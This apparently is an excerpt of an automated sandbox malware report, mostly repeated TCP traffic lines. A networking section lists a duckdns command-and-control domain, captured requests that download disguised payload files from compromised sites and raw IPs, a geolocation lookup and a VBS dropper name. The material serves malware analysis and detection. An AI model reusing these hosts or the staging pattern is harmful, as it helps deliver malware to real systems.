            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163

            Networking

            barindex
            Source: Malware configuration extractorURLs: iwarsut775laudrye2.duckdns.org
            Source: unknownDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: createdthingstobefrankwithmeeverywhe.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: createdthingstobefrankwithmeeverywhe.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: createdthingstobefrankwithmeeverywhere[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: createdthingstobefrankwithmeeverywhere[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
            Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 192.253.251.227 192.253.251.227
            Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
            Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
            Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
            Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /59/createdthingstobefrankwithmeeverywhere.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.45.34Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.45.34
